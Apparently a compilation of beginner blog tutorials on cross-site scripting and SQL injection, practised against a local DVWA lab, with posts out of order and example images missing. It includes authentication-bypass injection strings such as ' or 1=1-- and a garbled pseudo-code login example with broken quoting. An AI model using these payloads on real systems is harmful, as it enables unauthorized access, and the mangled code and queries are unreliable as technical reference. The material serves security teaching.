Cross Site Scripting - II



Cross Site Scripting - II

Persistent XSS Attack

In case of persistent attack, the code injected by the attacker will be stored in a secondary storage device (mostly on a database). The damage caused by Persistent attack is more than the non- persistent attack. Here we will see how to hijack other user‘s session by performing XSS.

Session

HTTP protocol is a stateless protocol, which means, it won‘t maintain any state with regard to
the request and response. All request and response are independent of each other. But most of the web application don‘t need this. Once the user has authenticated himself, the web server should not ask the username/password for the next request from the user. To do this, they need to maintain some kind of states between the web-browser and web-server which is done through the
―Sessions‖.

Cross Site Scripting - I





Cross Site Scripting - I



What is Cross Site Scripting ?

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy

Types of Cross Site Scripting

XSS attacks are broadly classified into 3  types

•    Non-Persistent ( Reflection Attack )
•    Persistent ( Stored Attack )
•    Dom Based XSS

Non-Persistent XSS Attack


In case of Non-Persistent attack, it requires a user to visit the specially crafted link by the attacker. When the user visits the link, the crafted code will get executed by the user‘s browser. Let us understand this attack better with an example.

Example for Non-Persistent XSS



When the victim load the above URL into the browser, he will see an alert box which says
.Even though this example doesn‘t do any damage, other than the annoying attacked
pop-up, you can see how an attacker can use this method to do several damaging things.

Again using Local Host DVWA Performing Xss Reflection Attack




Enter Any Name and Submit Check the Response of the Website
 




Example I used My Name Noah Franklin  See the Response of the Website its say Hello Noah

Franklin






The alert () method displays an alert box with a specified message and an OK button use the script which used in the below .
 



SQL Injection - II



SQL Injection - II  

 

Install Vmware and DVWA Steps http://noahfranklin.blogspot.in/2015/06/how-to-setup-web-application-pentesting.html

Open dvwa and select SQL Injection TAB perform SQL Injection attack and collect the users information

Enter 1 and submit and see the response from the Database to the browser it shows ID 1 is belongs to Admin account


SQL Injection - I



SQL Injection - I



SQL-Injection vulnerabilities and attacks occur between the Presentation tier and the CGI tier. Most vulnerabilities are accidentally made in the development stage. The data flow of each tier using normal and malicious input data are as shown in Figure 2. It depicts the users Authentication step. When an authenticated user enters its ID and Password, the Presentation tier uses the GET and  POST method to send the data to the CGI tier. The SQL query within the CGI tier connects to the database and processes the data.



When a malicious user enters an ID such as 1‘ or ‗1=1‘--, the query within the CGI tier becomes SELECT * FROM user WHERE id=1‘ or 1=1AND password=‘1111‘; after the --, the rest of the sentence becomes a comment and because or 1=1‘ is always true, the authentication step is bypassed. SQL Injection attacks are malicious data that changes the normal SQL query to a malicious SQL query and allows anomalous database access and processing.  Most web applications use data filters to prevent these  kinds of SQL injection attacks. However, there are many methods of SQL injection attacks which can bypass data filters which make it difficult to effectively defend the database from attacks. Therefore, a more effective way of detecting and preventing SQL injection attacks is necessary.


 Types of SQL Injection

  • Direct SQL Injection
Ex:  True Conditions (Tautology) like [   ‗or 1=1 --  ]

  • In-Direct SQL Injection
Ex: Query based injection, Blind Injection, String Based Injection, Character Based
Injection, Error Based SQLi, Error based Double Query Injection, XML Injection



Direct SQL Injection Understanding

if(username==franky) && (password==12345)
printf("Welcome to Email ");
else
{
printf("Invalid Username or password");
}

Explanation :
This above code meant the username and password both matches
with database then it will give a access to the email  Welcome

The email else the error message like Invalid username

Or password


Some Modification in Code

if(username==a ‘ or 1=1-- ) && (password==a‘ or 1=1--)
printf("Welcome to Email ");
else
{
printf("Invalid Username or password");
}

Pure dynamic SQL serves as the most common form of SQL injection attacks:
sqlString = ―SELECT… From [myTable] WHERE name =„‖.myInputValue.‖‟ ―;



Explanation
The same login coding with SQL injection attack then also email
Was logged and say a welcome